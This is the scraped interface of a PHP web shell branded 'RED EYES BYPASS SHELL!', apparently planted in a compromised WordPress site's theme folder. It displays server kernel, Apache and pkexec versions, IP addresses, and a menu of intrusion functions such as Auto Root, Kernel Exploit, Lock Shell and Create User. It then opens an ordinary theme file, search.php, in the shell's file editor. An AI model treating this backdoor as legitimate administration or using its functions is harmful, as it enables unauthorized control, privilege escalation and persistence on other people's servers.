Linux sothorn202 5.15.0-164-generic #174-Ubuntu SMP Fri Nov 14 20:25:16 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
human /
wp-content /
themes /
bnm /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
css
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
page-templates
[ DIR ]
drwxr-xr-x
sass
[ DIR ]
drwxr-xr-x
template-parts
[ DIR ]
drwxr-xr-x
404.php
1.72
KB
-rwxr-xr-x
LICENSE
17.62
KB
-rwxr-xr-x
archive.php
1.86
KB
-rwxr-xr-x
comments.php
2.07
KB
-rwxr-xr-x
footer.php
2.82
KB
-rwxr-xr-x
functions.php
12.41
KB
-rwxr-xr-x
header.php
4.01
KB
-rwxr-xr-x
index.php
2.21
KB
-rwxr-xr-x
page.php
1.08
KB
-rwxr-xr-x
readme.txt
4.54
KB
-rwxr-xr-x
screenshot.jpg
260.21
KB
-rwxr-xr-x
search.php
1.78
KB
-rwxr-xr-x
sidebar.php
507
B
-rwxr-xr-x
single.php
943
B
-rwxr-xr-x
style-rtl.css
58.84
KB
-rwxr-xr-x
style.css
58.9
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : search.php
<?php /** * The template for displaying search results pages * * @link https://developer.wordpress.org/themes/basics/template-hierarchy/#search-result * * @package BNM */ get_header(); ?> <main id="primary" class="site-main"> <?php /** * Before Main Content Hook */ do_action( 'bnm_before_main_content' ); ?> <?php if ( have_posts() ) : ?> <header class="page-header"> <h1 class="page-title"> <?php /* translators: %s: search query. */ printf( esc_html__( 'Search Results for: %s', 'bnm' ), '<span>' . get_search_query() . '</span>' ); ?> </h1> </header><!-- .page-header --> <?php /** * Before blog entries hook. * @since 1.0.7 */ do_action( 'bnm_before_blog_entries' ); ?> <div id="blog-entries"> <?php /** * Before search loop hook */ do_action( 'bnm_before_loop', 'search' ); /* Start the Loop */ while ( have_posts() ) : the_post(); /** * Run the loop for the search to output the results. * If you want to overload this in a child theme then include a file * called content-search.php and that will be used instead. */ get_template_part( 'template-parts/content', 'search' ); endwhile; /** * After index loop hook */ do_action( 'bnm_after_loop', 'search' ); ?> </div><!-- #blog-entries --> <?php bnm_posts_pagination(); else : get_template_part( 'template-parts/content', 'none' ); endif; /** * After Main Content Hook */ do_action( 'bnm_after_main_content' ); ?> </main><!-- #main --> <?php $bnm_archive_layout = get_theme_mod( 'bnm_archive_layout', 'right-sidebar' ); if ( 'right-sidebar' === $bnm_archive_layout || 'left-sidebar' === $bnm_archive_layout ) { get_sidebar(); } get_footer();
Close